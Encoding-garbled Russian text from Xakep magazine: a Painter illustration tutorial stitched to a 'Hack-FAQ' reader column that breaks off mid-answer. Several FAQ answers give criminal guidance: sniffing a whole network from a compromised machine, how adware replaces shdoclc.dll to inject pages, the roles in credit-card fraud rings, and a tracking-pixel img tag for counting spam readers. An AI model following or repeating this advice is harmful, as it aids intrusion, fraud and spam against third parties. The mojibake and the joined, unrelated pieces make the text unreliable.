Êîãäà îáúåêò áîëåå-ìåíåå îáðåë öâåò è ôîðìó, ïðèøëà ïîðà çàíÿòüñÿ ìåëêèìè äåòàëÿìè. Ìíå óäîáíåå âñåãî ýòî äåëàòü ñ ïîìîùüþ èíñòðóìåíòà Digital Airbrush.

òîÿòåëüíî. Äàëåå âñå î÷åíü ïðîñòî. Ïîäãîòîâèâ òåêñòóðó (îíà äîëæíà áûòü ÷åðíî-áåëîé), ñêîïèðóåì åå â áóôåð îáìåíà, à çàòåì, îòêðûâ ïàëèòðó òåêñòóð Painter’à, âûáèðàåì Windows > Library Palettes > Show Papers. Íàæàâ íà òðåóãîëüíèê, âûáèðàåì èç ìåíþ Capture Paper. Òàêèì îáðàçîì, ìû ïîëó÷àåì ñîáñòâåííóþ òåêñòóðó, êîòîðóþ ìîæåì èñïîëüçîâàòü òàê æå, êàê è îáû÷íûå.

XÀÊÅÐ 08 /80/ 06

045


ÄÈÇÀÉÍ ///// ISSUE

14

13

È ÑÍÎÂÀ ÄÅÒÀËÈ

Ïîñêîëüêó îáúåêòîâ íà ðèñóíêå äîñòàòî÷íî ìíîãî, òî âñå ýòè ïðîöåäóðû ïðèäåòñÿ ïîâòîðèòü ñòîëüêî ðàç, ñêîëüêî ýòîãî òðåáóåò ðèñóíîê. Ó÷èòûâàåì è òî, ÷òî âàæíûå â èëëþñòðàöèè îáúåêòû òðåáóþò ãîðàçäî áîëüøåãî âíèìàíèÿ è ïðîðàáîòêè äåòàëåé, ÷åì, íàïðèìåð, çàäíèé ïëàí.

15

ROTATE PAGE

Ñðåäè ïðî÷èõ ñâîèõ äîñòîèíñòâ, Painter èìååò îäíó óäèâèòåëüíóþ ôóíêöèþ, óäîáñòâî êîòîðîé îïÿòü-òàêè ñìîãóò îöåíèòü â ïåðâóþ î÷åðåäü òå, êòî ðàáîòàåò íà ãðàôè÷åñêèõ ïëàíøåòàõ. Ýòî «âðàùåíèå ðàáî÷åãî ëèñòà», ïðè êîòîðîì ìîæíî äîáèòüñÿ òàêîãî íàêëîíà øòðèõîâêè (èëè ðàñòóøåâêè), êîòîðûé óäîáåí ðóêå èëè íåîáõîäèì äëÿ ðàáîòû ñ òîé èëè èíîé ïëîñêîñòüþ íà ðèñóíêå. Äëÿ òîãî ÷òîáû ðàçâåðíóòü ëèñò, íóæíî âûáðàòü èíñòðóìåíò Rotate Page (îí íàõîäèòñÿ íà îäíîé êíîïêå ñ èíñòðóìåíòîì Grabber) èëè, óäåðæèâàÿ êîìáèíàöèþ <Alt>+<Space>, ðàçâåðíóòü ëèñò ìûøüþ. Èñêàæåíèÿ èçîáðàæåíèÿ ïðè ýòîì íå ïðîèñõîäèò!

16

ÎÒÅÊÑÒÓÐÈÂÀÍÈÅ

Äëÿ ïðèäàíèÿ êàðòèíêå áîëüøåé îðèãèíàëüíîñòè è ñòèëèçîâàííîñòè ïîïðîáóåì íàëîæèòü íà íåå ôîòîãðôè÷åñêèå òåêñòóðû. Íàïðèìåð, ñäåëàåì òàê, ÷òîáû ïîâåðõíîñòü àêêîðäåîíà êàê áóäòî áû øåëóøèëàñü. Äëÿ ýòîãî íàéäåì êàêîé-íèáóäü îáúåêò, èìåþùèé ïîäõîäÿùóþ äëÿ íàøåé öåëåé òåêñòóðó, è, ñôîòîãðàôèðîâàâ åãî, ïåðåíåñåì åå â Painter, âûáðàâ ïîäõîäÿùèé òèï íàëîæåíèÿ.

ÌÀÑÊÈ

Ïðè ïîìîùè ìàñîê ñêðûâàåì ëèøíèå ó÷àñòêè òåêñòóð. Ðàáîòà ñ ìàñêàìè â Painter àíàëîãè÷íà ðàáîòå ñ ìàñêàìè â Photoshop’å, ïîýòîìó íå âûçîâåò çàòðóäíåíèé.

ACTIONS ÈËÈ SCRIPTS? Íåñìîòðÿ íà òî, ÷òî â Photoshop’å ñöåíàðèè ïîÿâèëèñü äàâíî, ïî ñóòè, îíè ëèøü îòäàëåííî íàïîìèíàþò òî, ÷òî áûëî ñîçäàíî ïðîèçâîäèòåëÿìè Painter åäâà ëè íå â ïåðâîé âåðñèè ïðîãðàììû. Ñìûñë Scripts Painter’à â òîì, ÷òî îíè ìîãóò çàôèêñèðîâàòü âåñü ïðîöåññ ñîçäàíèÿ ðèñóíêà èëè êàêîãî-òî îäíîãî åãî ôðàãìåíòà.  îòëè÷èå îò Photoshop’à, â Painter’å âñåãäà ìîæíî çàôèêñèðîâàòü íå òîëüêî ïîðÿäîê äåéñòâèé è ôèëüòðîâ, íî è òðàåêòîðèþ êèñòåé, ïðîöåññ íàñòðîéêè öâåòîâîé ïàëèòðû è âñå, ÷òî äóøå óãîäíî! Ýòîò ìîùíûé ïàêåò îñîáåííî âûãîäåí â ïðîöåññå îáó÷åíèÿ.

ÐÀÁÎÒÀ Ñ ÌÀÑÊÀÌÈ Äëÿ ïîñòîÿííûõ ïîëüçîâàòåëåé Photoshop’à ðàáîòà ñ ìàñêàìè íå äîëæíà âûçûâàòü áîëüøèõ çàòðóäíåíèé. Íî åñòü íåêîòîðûå íþàíñû, êîòîðûå îòëè÷àþò ìàñêè Painter’à îò õîðîøî èçâåñòíûõ ìàñîê â Photoshop’å. Äëÿ òîãî ÷òîáû ñîçäàòü ìàñêó, íóæíî âûáðàòü â ìåíþ Layers > Create Layer Mask èëè êëèêíóòü íà ñàìóþ ïðàâóþ êíîïêó âíèçó ïàëèòðû Layers. Ïðèíöèï ðàáîòû ñ ìàñêàìè àíàëîãè÷åí ðàáîòå ñ ìàñêàìè â Photoshop’å. Äëÿ òîãî ÷òîáû ïåðåéòè â ðåæèì ðàáîòû ñ ìàñêîé, íóæíî ïðîñòî ïî íåé êëèêíóòü íà ïàëèòðó Layers. Åñëè õî÷åòñÿ óâèäåòü ñîäåðæèìîå ìàñêè, òî äîñòàòî÷íî ðàçâåðíóòü ïàëèòðó Channels.

046

XÀÊÅÐ 08 /80/ 06


ÏÎ ÑÒÎÏÀÌ ÄÎÍÀ ÍÀÑÒÐÎÉÊÀ ÑÈÃÌÈËËÅÐÀ ÊÈÑÒÅÉ

17

ÏßÒÍÀ

 ñâÿçè ñ òåì, ÷òî â îñíîâíîì ðàáîòà ïðîèñõîäèò íå ñ ïîëíûì èçîáðàæåíèåì, à åãî ôðàãìåíòàìè, òî èíîãäà ìåæäó îòäåëüíûìè åãî ÷àñòÿìè âîçíèêàþò íåñîîòâåòñòâèÿ êîíòðàñòîâ. Îò íèõ ìîæíî èçáàâèòüñÿ ïðè ïîìîùè èíñòðóìåíòîâ Dodge è Burn, çàòåìíÿÿ ñëèøêîì ñâåòëûå ó÷àñòêè è âûñâåòëÿÿ òåìíûå. Åñëè êàêèå-òî ôðàãìåíòû íà çàäíåì ïëàíå «âûâàëèâàþòñÿ» èç âñåé êîìïîçèöèè èç-çà îáèëèÿ ìåëêèõ äåòàëåé, òî èõ ìîæíî íåìíîãî ðàçìûòü, èñïîëüçóÿ èíñòðóìåíò Blur.

Íå òàê äàíî ÿ ïðî÷èòàë êíèãó Äîíà Ñèãìèëëåðà Digital Character Design and Painting, â êîòîðîé îí ðàññêàçûâàë î ñâîåé òåõíèêå ðèñîâàíèÿ. Íàâåðíÿêà òå, êòî ó÷èëèñü ïðîìûøëåííîìó äèçàéíó, çíàêîìû ñ ýòîé òåõíèêîé â «íåêîìïüþòåðíîì» âàðèàíòå: â åå îñíîâå ëåæèò èñïîëüçîâàíèå êàðàíäàøà è ðàñòóøåâêè. Äîí Ñèãìèëëåð íàñòðîèë íåñêîëüêî èíñòðóìåíòîâ äëÿ èìèòàöèè ýòîé òåõíèêè íà êîìïüþòåðå. Âûíóæäåí ïðèçíàòü, ÷òî åãî ñïîñîá ðèñîâàíèÿ è ñîçäàííûå èì èíñòðóìåíòû ìíå ïîêàçàëèñü íå î÷åíü óäîáíûìè.  ýòîì óðîêå ÿ ðàññêàæó î íåêîòîðûõ îñíîâîïîëàãàþùèõ ìîìåíòàõ ýòîé òåõíèêè, â îñíîâå êîòîðîé òàêæå ëåæàò ðàñòóøåâàííûå øòðèõè.

Íàñòðîéêà êèñòåé â Painter’å — ýòî îñîáûé âèä èñêóññòâà. Âî-ïåðâûõ, î÷åíü ìíîãî ïàðàìåòðîâ êèñòè íàõîäèòñÿ â ïàëèòðå ñâîéñòâ èíñòðóìåíòà, Property Bar. Òàì ìîæíî íàñòðîèòü ðàçìåð êèñòè, åå ïðîçðà÷íîñòü è ïðî÷åå. Òàê æå ñóùåñòâóåò óòèëèòà, ñ ïîìîùüþ êîòîðîé ìîæíî ðåäàêòèðîâàòü èìåþùèåñÿ êèñòè è ñîçäàâàòü ñîáñòâåííûå, ñîîòâåòñòâóþùèå èñêëþ÷èòåëüíî àâòîðñêîìó çàìûñëó. Ïðè÷åì êîëè÷åñòâî ïàðàìåòðîâ è íàñòðîåê ýòèõ êèñòåé íà÷èíàþùåãî ïîëüçîâàòåëÿ ìîæåò íåìíîãî øîêèðîâàòü.


ÂÇËÎÌ ///// ISSUE

HACK-FFAQ ÁÓÄÜ ÊÎÍÊÐÅÒÍÛÌ È ÇÀÄÀÂÀÉ ÊÎÍÊÐÅÒÍÛÅ ÂÎÏÐÎÑÛ! ÑÒÀÐÀÉÑß ÎÔÎÐÌÈÒÜ ÑÂÎÞ ÏÐÎÁËÅÌÓ ÌÀÊÑÈÌÀËÜÍÎ ÄÅÒÀËÜÍÎ ÏÅÐÅÄ ÏÎÑÛËÊÎÉ Â HACK-FAQ. ÒÎËÜÊÎ ÒÀÊ ß ÑÌÎÃÓ ÄÅÉÑÒÂÈÒÅËÜÍÎ ÏÎÌÎ×Ü ÒÅÁÅ ÎÒÂÅÒÎÌ, ÓÊÀÇÀÒÜ ÍÀ ÂÎÇÌÎÆÍÛÅ ÎØÈÁÊÈ. ÎÑÒÅÐÅÃÀÉÑß ÎÁÙÈÕ ÂÎÏÐÎÑΠÂÐÎÄÅ «ÊÀÊ ÂÇËÎÌÀÒÜ ÈÍÒÅÐÍÅÒ?», ÒÛ ËÈØÜ ÏÎÒÐÀÒÈØÜ ÌÎÉ È ÑÂÎÉ ÏÎ×ÒÎÂÛÉ ÒÐÀÔÈÊ. ÒÐßÑÒÈ ÈÇ ÌÅÍß ÔÐÈØÊÈ (ÈÍÅÒ, ØÅËËÛ, ÊÀÐÒÛ) — ÍÅ ÑÒÎÈÒ, ß ÑÀÌ ÆÈÂÓ ÍÀ ÃÓÌÀÍÈÒÀÐÍÓÞ ÏÎÌÎÙÜ!

hack_FAQ comments:

SIDEX: hack-faq@real.xakep.ru _vzlom

Q: Ó ìåíÿ åñòü äîñòóï ê îäíîìó èç êîìïîâ óäàëåííîé ñåòè (ñåòü àíòèêâàðíàÿ è àäìèí — ëîõ). Êàê ìíå ñíè ôàòü âñþ ñåòêó ðàçîì ñ çàõâà÷åííîé ìàøèíû? A: Òâîé âîïðîñ ïîäîéäåò êàê èëëþñòðàöèÿ ââîäíîãî ñëîâà â íà÷àëå ðóáðèêè: «áóäü êîíêðåòíûì»! ×òî òàêîå «àíòèêâàðíàÿ» ñåòü? Ýòî òàì, ãäå íåò ñåðâàêà Cray X1, èëè òàì, ãäå âñå êðóòèòñÿ ïîä NT 3.51? Ïîçâîëþ ðàñøèôðîâàòü ñëîâî çà òåáÿ è ñêàæó, ÷òî òâîÿ ñåòü äî ñèõ ïîð ñòîèò íà õàáàõ, íå ñâèò÷àõ. Ýòî îáëåã÷èò ìîþ çàäà÷ó îòâåò÷èêà. Ïðîñòåéøèé poorsniffer èëè The Gobbler ïðîøåðñòèò âåñü ïîòîê èíôû è ñëîæèò â àêêóðàòíåíüêèé ëîã-ôàéë íà çàõâà÷åííîé ìàøèíå. ß íå áóäó âîïðîøàòü, íàñêîëüêî àäìèí ëîõ, òàê êàê â êðàéíîñòè ïîäîáíîãî ïðîÿâëåíèÿ ðàçóìíûé âçëîìùèê ñìîã áû è âñþ ñåòü ïîëîæèòü íà ëîïàòêè...  áóäóùåì äàâàé îïèñàíèÿ ïî äåëó, áåç ýìîöèé. Q: Òóò ïðî÷èòàë íåäàâíî ìîäíîãî Äýâèäà Áðàóíà «Öèôðîâóþ êðåïîñòü». Ðåàëüíî âîîáùå ñîçäàòü òîò ìîùíåöêèé êîìï èç êíèæêè ñ 3 ìèëëèîíàìè ïðîöåññîðîâ? A: Âîïðîñ îáñóæäàëñÿ è ïðåæäå, íî ðîññèéñêîå èçäàíèå êíèãè îòíîñèòåëüíî ñâåæî, ïîýòîìó ïîçâîëþ ïîâòîðèòüñÿ. Ðàçëè÷èå ìåæäó ïèñàòåëÿìè-ñêàçî÷íèêàìè è àâòîðàìè Õ: ïåðâûå ïèøóò ñêàçêè, à ìû ñêàçêó äåëàåì áûëüþ! Îäíàêî çäåñü äàæå ìû áåññèëüíû, ïîòîìó ÷òî çà 9 ëåò, ïðîøåäøèõ ñ ìîìåíòà âûõîäà îðèãèíàëà êíèãè (Digital Fortress), ïîäîáíîãî êîìïà íå ïîÿâèëîñü. Õîòÿ íàäî çàìåòèòü, ÷òî Intel â íàñòîÿùèé ìîìåíò âêëàäûâàåò áîëüøèå äåíüãè â ðàçðàáîòêó ìíîãîÿäåðíûõ ïðîöåññîðîâ è èìåííî â ýòîì âèäèò ïåðñïåêòèâû ãëîáàëüíîãî ðîñòà ïðîèçâîäèòåëüíîñòè êàìíåé. Òàê ÷òî êòî çíàåò, ìîæåò, ÷åðåç íåñêîëüêî ëåò òàêèå ñèñòåìû ñòàíóò è â ñàìîì äåëå äîñòóïíûìè. Q: Ïèøåì íàâîðî÷åííûé adware, íî äî ñèõ ïîð íå äîãíàëè, êàê âñòàâèòü íàøó ñòðàíè÷êó ïðè dns-î îøèáêàõ, êîãäà þçåð ëåçåò íà íåñóùåñòâóþùèé ñåðâåð? A: Âïåðâûå ïîçíàêîìèëñÿ ñ òåìîé ïîñëå óñòàíîâêè î÷åðåäíîãî ICQ-ïëóãèíà. Òùàòåëüíîå èçó÷åíèå ñèñòåìû ïðèâåëî ê ôàéëó shdoclc.dll â ñèñòåìíîé ïàïêå, êîòîðûé ïîäìåíÿåòñÿ äëÿ ïîñëåäóþùåãî âûâåäåíèÿ íóæíîãî ðåêëàìùèêó ñîîáùåíèÿ. Ñëåäóåò îòìåòèòü, ÷òî êàæäûé ïåðâûé spyware/adware-ñêàíåð (âðîäå Ad-aware) ïîñòîÿííî íàáëþäàåò çà îáîçíà÷åííûì ôàéëîì, à â ñëó÷àå ïîïûòêè ïîäìåíû îïîâåùàåò þçåðà è âîçâðàùàåò âñå íà ïðåæíèå ïîçèöèè. Ïîäîáíûå âîïðîñû — ìîé õëåá, íî ïðè ïðîôåññèîíàëüíîì ïîäõîäå ê ñîçäàíèþ ïîäîáíûõ âàðåç-øåäåâðîâ ëó÷øå îáêàòûâàòü óæå ñóùåñòâóþùèõ ïàðàçèòîâ íà ñîáñòâåííîé ìàøèíå, ÷òîáû âûÿâèòü âíåäðåííûå èçìåíåíèÿ è ñïîñîáû èõ âíåäðåíèÿ. Q: Êà÷àþ âàðåç â ðåæèìå non stop, íî â p2p ïîñòîÿí íî íàòûêàþñü íà âñÿêóþ ëåâîòó âìåñòî æåëàííûõ ñëàäîñòåé! Êàê îáúåõàòü ýòè ïîäñòàâû? A: Ïîìíèøü ïîñëîâèöó «ïîñïåøèøü — ëþäåé íàñìåøèøü»? Çäåñü îíî î÷åíü àêòóàëüíî. Ïåðåä ñêà÷èâàíèåì âåñîìîãî ïàêà (çíà÷èò, çàòðàòû òðàôèêà è âðåìåíè), ðàçóìíî ïðîâåðèòü, à âûøåë/ïëàíèðóåòñÿ ëè ê âûõîäó ïîäîáíûé ôèëüì/àëüáîì/ñîôò? Æåëàíèå îáðåñòè âñå ñàìîå ñâåæåå ðàíüøå âñåõ îñòàëüíûõ ÷àñòî êàðàåòñÿ âïàðêîé ðåêëàìíûõ ïîðíîôèëüìîâ âìåñòî æåëàííîãî êîíòåíòà. Íåðàçóìíî îáèæàòüñÿ íà äèíàìùèêîâ, êîòîðûå ðàñïðîñòðàíÿþò Windows Longhorn Final Edition, ïîòîìó ÷òî ïîäîáíîãî ðåëèçà íåò äàæå â ñàìûõ ýëèòíûõ âàðåç-àðõèâàõ. Òàê æå êàê íå äîñòóïåí Matrix 5: Ejaculations è Terminator 6. Êîíå÷íî, áûâàþò êðóòåé-

048

XÀÊÅÐ 01 /85/ 05


øèå óòå÷êè, âðîäå óêðàäåííîãî Half Life 2 ãîäà íàçàä, íî îá ýòîì è òàê êðè÷àëè âñå íîâîñòíûå ëåíòû. Èìåííî òàì, ñïðîñèâ ó Ãóãëà, ìîæíî ïðîâåðèòü ðåàëüíîñòü äîáðà èç p2p.  90% ñëó÷àåâ ìîæíî ïîëàãàòüñÿ è íà êîììåíòàðèè þçåðîâ, êîòîðûå, ïðîÿâëÿÿ goodwill, îïîâåùàþò êîëëåã î ïîääåëêàõ. Äðóãîå äåëî, ÷òî ìíîãèå èç þçåðîâ íåäîñòàòî÷íî ãðàìîòíû äëÿ âïèñêè êîììåíòîâ íà àíãëèéñêîì. Çäåñü ìîæíî è íå ìó÷èòüñÿ ñ ïåðåâîäîì, òàê êàê áîëåå ïîëîâèíû íåãàòèâíûõ (êðàñíûõ â e-Donkey) ÿñíî óêàæóò íà ëàæó. Q:  ÷åì ðàçíèöà ìåæäó «âáèâùèêàìè» è «àíàëüùèêàìè»? Êîìó æèâåòñÿ ñëàùå? A: Åñëè äîâåðèòüñÿ òâîåìó îøèáî÷íîìó íàïèñàíèþ èìåí ýòèõ äðóçåé, ïîëó÷àåòñÿ, ÷òî îäèí àêòèâíûé, à äðóãîé ïàññèâíûé ãîìîñåêñóàëèñò :). «Íàëüùèê» èëè «îáíàëüùèê» — òîò, êòî ïåðåâîäèò äåíüãè, óêðàäåííûå ñ êðåäèòíûõ êàðò, âî âïîëíå îñÿçàåìûå äåíåæíûå åäèíèöû — êýø. Îí ìîæåò ÿâëÿòüñÿ ïîëó÷àòåëåì äåíåæíîãî ÷åêà, êîòîðûé îáðàùàåòñÿ â æåëàííûå åäèíèöû ïîñëå âèçèòà â áàíê. Åãî ðèñê — áûòü ïåðåâàðåííûì âíóòðåííèìè îðãàíàìè ïðè ñîîòâåòñòâóþùåì âèçèòå. ×àñòî ýòî àìïëóà ñîâìåùàåòñÿ è ñ äðóãèì — äðîïà, òî åñòü ïîëó÷àòåëÿ òîâàðà, êîòîðûé áûë çàêóïëåí ïî ÑÑ. Âáèâùèê — òîò ñëàâíûé ãîñïîäèí (ãîñïîæà), êîòîðûé(àÿ) ââîäèò äàííûå î êðåäèòíûõ êàðòàõ â ôîðìû ðàçíîîáðàçíûõ áèëëèíãîâ, áàíêîâ è ñèñòåì äåíåæíûõ ïåðåâîäîâ.  ñïèñîê åãî îáÿçàííîñòåé ìîæåò âõîäèòü è ïîääåðæêà ïåðåïèñêè ñ «ñåðâåðíîé ñòîðîíîé», êîãäà ìîãóò âîçíèêíóòü âîïðîñû ïðàâîîáëàäàíèÿ èñïîëüçîâàííîé ÑÑ. Áûâàåò è òàê, ÷òî ðàñïðåäåëÿòü ïîäîáíûå ìîøåííè÷åñêèå îáÿçàííîñòè íå ñòîèò, ïîòîìó ÷òî êàæäîå íîâîå çâåíî êðèìèíàëüíîé öåïè — íîâûé øàíñ ïîïàëèòüñÿ. Îòäåëüíûå òâîðöû ñîâìåùàþò â ñåáå ðàçîì âñå îïèñàííûå âûøå «äîáðîäåòåëè». Q: Àäìèíþ ñåòêó è õî÷ó âûëîâèòü âñåõ packet monkeys ëîêàëêè, çàìàíèâ íà honeypot. Îäíàêî ïîä ðóêîé íåò íè îäíîãî äèñòðèáà WinXP áåç âøèòîãî SP2 :(. Êàê óäàëèòü ýòîò ïàê èç ñèñòåìû? A: Åñëè åñòü ñèñòåìà, êóäà SP2 ñòàâèëñÿ âðó÷íóþ, òî óäàëèòü äîáðî ìîæíî áóäåò ÷åðåç System Restore (âîññòàíîâëåíèå ñèñòåìû), ïîñòàâèâ äàòó «îòêðóòêè» (restore point) — ìîìåíò óñòàíîâêè ïàêà. Îäíàêî ðåøåíèå äàëåêî îò èäåàëà, òàê êàê äàæå ïîñëå ðó÷íîé çà÷èñòêè ñèñòåìû îò âñåõ íàõîäèâøèõñÿ òàì äîêóìåíòîâ è ëîãîâ ìîæåò îñòàòüñÿ íå÷òî, ÷åì ïîæèâÿòñÿ òå ñàìûå monkeys. Ïðåäïîëàãàåòñÿ, ÷òî ñèñòåìà äîëæíà áûòü äåâñòâåííî ÷èñòîé è âåñü äîïîëíèòåëüíûé êîíòåíò äîëæåí áûòü ðàçìåùåí íàìåðåííî (âåðîÿòíî, äëÿ ïðîâåäåíèÿ ïîñëåäóþùèõ ïðîâîêàöèé ïðîòèâ àòàêóþùèõ ìàðòûøåê). Íîâóþ èíñòàëëÿöèþ XP (SP2) ìîæíî áóäåò «î÷èñòèòü» îò SP ÷åðåç c:\windows\$NtServicePackUninstall$\spuninst\ spuninst.exe. Q: Êàê êðó÷å âñåãî ïîèçäåâàòüñÿ íàä çàáðàâ øèìñÿ â ìîé honeypot ïîãàíöåì? A: Ðàññêàæó î ðåàëüíîì ñëó÷àå, êîòîðûé óñòðîèëè ìîè ïðèÿòåëè. Ïîñòàâèâ íåçàïàðîëåííîãî Radmin'a (íà èçîëèðîâàííûé, íî âûâåäåííûé â èíåò êîìï â ñåòè áàíêà), îíè ñòàëè æäàòü, ðûáà-

XÀÊÅÐ 01 /85/ 05

÷èòü íà çëîñòíîãî õàêåðà. Æäàòü äîëãî íå ïðèøëîñü, íà âòîðîé äåíü â ñèñòåìó âïèñàëñÿ «öèôðîâîé òåððîðèñò». Äëÿ ïðàâèëüíîãî «îôîðìëåíèÿ» ñèñòåìû «ìîè äîêóìåíòû» áûëè íàïîëíåíû ëåâûìè êíèãàìè áóõãàëòåðñêîé îò÷åòíîñòè, âûïèñêàìè ïî ñ÷åòàì è îïèñàíèÿìè ïðîâåäåííûõ òðàíçàêöèé. Íà ñàìîå æå âèäíîå ìåñòî áûë ïîëîæåí ÿðëûê íà äîêóìåíò-èíñòðóêöèþ ïî îáíàëè÷èâàíèþ N-íîé ñóììû. Òàì áûëè äåòàëüíî îïèñàíû øàãè, âêëþ÷àÿ íåîáõîäèìóþ àâòîðèçàöèþ, ÿâêè è ïàðîëè. Þíåö îêàçàëñÿ õðàáð è óæå íà äðóãîé äåíü ïîïðîáîâàë ñðóáèòü êýø, ïðîâåäÿ ñåðèþ çâîíêîâ è ïðåäñòàâèâøèñü «äîâåðåííûì ëèöîì». Äëÿ áîëüøåé óáåäèòåëüíîñòè è ñîçäàíèÿ èëëþçèè àìåðèêàíñêîãî áàíêà, îïåðèðóåìîãî ëîõàìè â Ìîñêâå, òåëåôîí áûë îñòàâëåí â Íüþ-Éîðêå, îòêóäà áûë íàñòðîåí ôîðâàðä íà ìîáèëó îäíîãî èç ðàçâîäÿùèõ àäìèíîâ. Òå ïðèãëàñèëè ïîäúåõàòü ïàðíÿ â îôèñ, ãäå òîãî äîëãî æäàòü íå ïðèøëîñü. Ïîÿâèâøèñü, áûë íàïðàâëåí íà securityäîñìîòð ïîä ïðåäëîãîì «ñïåöèàëüíîãî ïîëîæåíèÿ ôèíàíñîâîãî ó÷ðåæäåíèÿ». Òàì áåäíÿãó ðàçäåëè äî òðóñîâ è îáúÿâèëè: «Âàñ ñíèìàåò ñêðûòàÿ êàìåðà». Ïðåäëîæèëè óéòè íà ôåâðàëüñêèé ìîðîç â åùå íàëè÷åñòâîâàâøèõ òðóñàõ èëè äîæäàòüñÿ ïðèåçäà ìèëèöèè â òåïëå. Þíåö ïðåäïî÷åë ïåðâîå :). Åñëè êòî-òî èç ÷èòàòåëåé çíàêîì ñ áåäîëàãîé, ïîæàëóéñòà, íàïèøèòå, ïîñòàðàþñü ïîìî÷ü ñ âîçâðàòîì îäåæäû. Q: Ìåíÿ ëîìàåò ðàçáèðàòüñÿ ñ ìàíóàëàìè, íî õî÷ó íàñòðîèòü ôàéðâîë â Linux, ÷òîáû íå ïóñ êàë õàêåðþã íà îòäåëüíûå ïîðòû, ÷òîáû òóäà òîëüêî «ñâîè» çàïîëçàëè! A: Íà ñàìîì äåëå, ýòà ðóáðèêà äëÿ òåõ, êòî íå íàøåë îòâåòû â ìàíóàëàõ... ìû íå õàíæè, è ñàìèì ïîðîé ñèëû âîëè íå õâàòàåò íà ðàòíûå ïîäâèãè, ïîýòîìó ïîäåëþñü ïðîñòûì ðåøåíèåì äëÿ IPTABLES. Ñòðîêà «iptables -I INPUT -i eth1 -p tcp --dport ñëóæáà -s 192.168.0.xx -j ACCEPT», äîáàâëåííàÿ â êîíôèã, ïîìîæåò çàêðûòü äîñòóï äëÿ «ñëóæáû» âñåì èçâíå è áóäåò ïóñêàòü ñî âñåõ àäðåñîâ ëîêàëêè (192.168.0.xx). Ñëóæáîé ìîæåò áûòü ëþáîé ïðåäëàãàåìûé ñåðâèñ; ó ìåíÿ ñòîèò ïîäîáíàÿ íàñòðîéêà íà SSH, ÷åðåç êîòîðûé ìóòÿòñÿ è îñòàëüíûå òåìû: ïî÷òà, ftp, news. Q: Âîëåþ ñëó÷àÿ ïîëüçîâàëñÿ ïàðó äíåé äîèñòîðè÷åñêèì íîóòîì íà win 95, íî ìåíÿ òàì âûøèáàëî êàêèì-òòî nuke'îì. Ðàññêàæè îá ýòîé àòàêå è ÷åì-í íèáóäü ïîäîáíîì ïðîòèâ ñòàðûõ îïåðàöèîíîê, êîòîðûå åùå âûòÿãèâàåò ìîé íîóò! A: Ïðåêðàùåíèå ïîääåðæêè ñòàðûõ âåðñèé ñîôòà áåçóñëîâíî ðàçóìíî, íî òîëüêî ëèøü ñ òåì óñëîâèåì, ÷òî äåâåëîïåðû áóäóò òàêæå ïîñòàâëÿòü íîâîå ìîùíîå æåëåçî äëÿ ðàáîòû ñ ïîñëåäíèìè âåðñèÿìè... Òåì æå, êîìó âñå åùå ïðèõîäèòñÿ ðàáîòàòü ñî ñòàðûì äîáðîì, ïðåäïèñàíî ïîçíàâàòü ðàäîñòè èçâåñòíûå åùå 8 ëåò íàçàä áîëåå ïðîäâèíóòûì êîëëåãàì. Nuke — ýêñïëóàòàöèÿ îøèáêè win95 â NetBIOS-ñëóæáå, êîòîðàÿ îáåñïå÷èâàåò «Îáùèé äîñòóï». Ïðèíÿâ NB-ïàêåò, çàêàí÷èâàþùèéñÿ íóëåì, ñèñòåìà óõîäèò â êîìàòîç è âûáðàñûâàåò âñåì èçâåñòíûé «ñèíèé ýêðàí ñìåðòè». Ñóùåñòâóþò êàê îòäåëüíûå ïàò÷è, òàê è öåëüíîå MS-ðåøåíèå —

Win95 SE. Ñòîèò îòìåòèòü, ÷òî àòàêó ïðîòèâ òåáÿ ïðîâåë ñêîðåå âñåãî îäèí èç ñîñåäåé ïî ñåòè, òàê êàê 95-ûõ ìàøèí ñåé÷àñ îñòàëîñü äîâîëüíî ìàëî, è íàäî òî÷íî çíàòü àäðåñ äàííîãî ðàðèòåòà. Èç ñõîæèõ øèðîêî èçâåñòíûõ óÿçâèìîñòåé ìîæíî îòìåòèòü IGMP-àòàêó íà win98. Íàèáîëåå èçâåñòíîé ðåàëèçàöèåé áûë voidozer, íàïèñàííûé ïîêîéíûì Àíäðååì Äþêîâûì (www.void.ru). Q: Çàêàç÷èê ñïàì-ð ðàññûëêè õî÷åò ïëàòèòü òîëü êî çà êîëè÷åñòâî ïðèâåäåííûõ ïîñåòèòåëåé è êàêóþ-òòî äîëþ çà òåõ, êòî ïðîñòî ïðî÷èòàëè ïèñüìî. Êàê ìû ñìîæåì ðàçîáðàòü, êàêèå èç ïî ñåòèòåëåé ìîè, à êàêèå åãî? A: Ëþáîé êðèìèíàë, äàæå ñàìûé áåçîáèäíûé è êîìïüþòåðèçèðîâàííûé, òðåáóåò âçàèìíîãî äîâåðèÿ ìåæäó ïîäåëüùèêàìè èëè, ïî êðàéíåé ìåðå, èëëþçèþ îíîãî.  ýòîì ñïîñîáå, î êîòîðîì ÿ ðàññêàæó, ïîäîáíîå äîâåðèå òðåáóåòñÿ â îòíîøåíèå çàêàç÷èêà: íàñêîëüêî ïîëíî îí áóäåò ñ÷èòàòü õîñòû, ïðèâåäåííûå ñïàìåðîì. Èäåÿ çàêëþ÷àåòñÿ â òîì, ÷òî ëèíê íà ñòðàíè÷êó çàêàç÷èêà áóäåò çàêëþ÷àòü referral-íîìåð (èìÿ) ñïàìåðà, òàê ÷òî ïðè ïîäñ÷åòå îáðàùåíèé áóäóò âûñâå÷èâàòüñÿ èìåííî õèòû (õîñòû) êîíêðåòíîãî ñïàìåðà. ×èñëî ïðî÷èòàâøèõ ìîæåò áûòü âûâåäåíî ïðè ðàáîòå ñ þçåðîì íà html, ïîääåðæèâàþùèé email êëèåíòà, êîòîðûé ñåãîäíÿ íàèáîëåå ðàñïðîñòðàíåí. Ïðîñòûì è ýëåãàíòíûì ðåøåíèåì îêàçûâàåòñÿ âêëþ÷åíèå ññûëêè íà êàðòèíêó <img src=http://www.xakep.ru/monitoring/SpamReceiverJ ustCameIn.asp?spam@spam.your.ID border=0 width=1 height=1>. Ïîëó÷àòåëü îòêðûâàåò ïèñüìî è àâòîìàòè÷åñêè çàãðóæàåò óêàçàííóþ êàðòèíêó. Òåïåðü âñå çàâèñèò îò çàêàç÷èêà, êîòîðûé äîëæåí ÷åñòíî ïîñ÷èòàòü êîëè÷åñòâî çàãðóçîê ñ åãî ñàéòà. Ñïàìåð ìîæåò, êîíå÷íî, âåñòè è ñâîé ïàðàëëåëüíûé ïîäñ÷åò, êîãäà êàðòèíêè áóäóò ãðóçèòüñÿ è ñ÷èòàòüñÿ ïðÿìî íà åãî ðåñóðñå. Òîãäà ïðè ïàðàëëåëüíîì 